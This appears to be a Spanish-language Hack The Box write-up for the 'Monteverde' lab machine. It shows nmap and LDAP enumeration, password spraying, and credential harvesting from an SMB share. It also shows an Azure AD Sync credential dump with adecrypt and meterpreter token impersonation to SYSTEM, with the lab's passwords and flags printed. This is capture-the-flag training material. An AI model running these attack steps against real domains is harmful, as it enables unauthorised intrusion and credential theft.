f4d3

f4d3

InfoSec enthusiast | pwn | RE | CTF | BugBounty

HTB{monteverde}

recon

nmap

# Nmap 7.80 scan initiated Thu Mar 19 18:04:54 2020 as: nmap -sC -sV -p- -v -o monteverde_tcp.nmap 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.19s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-19 21:24:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49774/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/19%Time=5E73E09F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m51s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-03-19T21:27:24
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 19 18:19:09 2020 -- 1 IP address (1 host up) scanned in 855.05 seconds

Búsqueda básica en el ldap

ldapsearch -h 10.10.10.172 -x -b "DC=MEGABANK,DC=LOCAL"

cat ldap.log  | grep user
description: Default container for upgraded user accounts
objectClass: user
userAccountControl: 66082
description: Servers in this group enable users of RemoteApp programs and pers
 e users RemoteApp programs and personal virtual desktops run. This group need
 is applies only to WMI namespaces that grant access to the user.
objectClass: user
userAccountControl: 532480
description: All domain users
description: Servers in this group can access remote access properties of user
description: Members of this group can update user accounts in Active Director
objectClass: user
userAccountControl: 66048
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\mhope
userPrincipalName: mhope@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-ata@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-bexec@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-netapp@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\dgalanos
userPrincipalName: dgalanos@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\roleary
userPrincipalName: roleary@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\smorgan
userPrincipalName: smorgan@MEGABANK.LOCAL

cat ldap.log | grep user| grep home | awk -F 'users' '{print $2}' | tr -d '$\\' > users.txt

dgalanos
mhope
roleary
SABatchJobs
SatchJobs
smorgan
svc-ata
svc-bexec
svc-netapp

user.txt

Utilizando estos mismos usuarios como contraseñas, obtenemos uno válido:

root@Kali:~/Documentos/hackthebox/machines/monteverde for k in `cat users.txt`; do smbmap -u $k -d MEGABANK.LOCAL -p $k  -H 10.10.10.172; done

SABatchJobs:SABatchJobs

root@Kali:~/Documentos/hackthebox/machines/monteverde smbclient -W MEGABANK.LOCAL '\\10.10.10.172\users$' -U 'SABatchJobs'%'SABatchJobs'                                                          
Try "help" to get a list of possible
smb: \> cd mhope                                                                                 
lsmb: \mhope\> ls                                                                                                                                                                                  
  .                                   D        0  Fri Jan  3 10:41:18 2020                       
  ..                                  D        0  Fri Jan  3 10:41:18 2020                                                                                                                         
  azure.xml                          AR     1212  Fri Jan  3 10:40:23 2020                                                                                                                         

                524031 blocks of size 4096. 519955 blocks available                                                                                                                                
smb: \mhope\> get azure.xml                                                                      
getting file \mhope\azure.xml of size 1212 as azure.xml (1,3 KiloBytes/sec) (average 1,3 KiloBytes/sec)                               D        0  Fri Jan  3 10:10:30 2020       

creds

root@Kali:~/Documentos/hackthebox/machines/montevroot
erde/user.txt# cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>root@Kali:~/Documentos/hackthebox/machines/monteverde/user.txt#

Usamos el mismo script para ver de quién son las creds:

son de mhope.

winrm con mhope:4n0therD4y@n0th3r$

user.txt:4961976bd7d8f4eeb2ce3705e2f212f2

root.txt

PS C:\Users\mhope\Documents> whoami /all

USER INFORMATION
----------------

User Name      SID                                         
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes                                        
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group

Con esto, tendremos privilegios necesarios para dumpear las creds del administrador abusando el XML encrypt en las sentencias SQL el azure ad sync link

PS C:\program files\microsoft azure ad sync\bin> C:\Windows\System32\spool\drivers\color\adecrypt.exe -FullSQL
C:\Windows\System32\spool\drivers\color\adecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

PS C:\program files\microsoft azure ad sync\bin>

got it

ot@Kali:~/Documentos/hackthebox/machines/monteverde/root.txt# ruby winrm_admin.rb
PS C:\Users\Administrator\Documents> whoami
megabank\administrator
PS C:\Users\Administrator\Documents> type C:\users\administrator\desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
PS C:\Users\Administrator\Documents>

Para System

erpreter > load incognito                
Loading extension incognito...Success.                                                                                         
meterpreter > list_tokens -u                                                                                                                                                                       
[-] Warning: Not currently running as SYSTEM, not all tokens will be available                                                                                                                     
             Call rev2self if primary process token is SYSTEM                                    

Delegation Tokens Available                      
========================================                                                                               
Font Driver Host\UMFD-0                          
Font Driver Host\UMFD-1                          
MEGABANK\AAD_987d7f2f57d2       
MEGABANK\Administrator      
MEGABANK\mhope                                   
NT AUTHORITY\LOCAL SERVICE                     
NT AUTHORITY\SYSTEM                                                       
NT SERVICE\SQLTELEMETRY                                                   
Window Manager\DWM-1                                                                      
Impersonation Tokens Available                                                              
========================================                                                         
NT AUTHORITY\NETWORK SERVICE                                                                     
NT SERVICE\MSSQLSERVER                                                                           
                                                                                                                                                                                                   
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"                                            

[+] Successfully impersonated user NT AUTHORITY\SYSTEM                                                                                                                                             
meterpreter >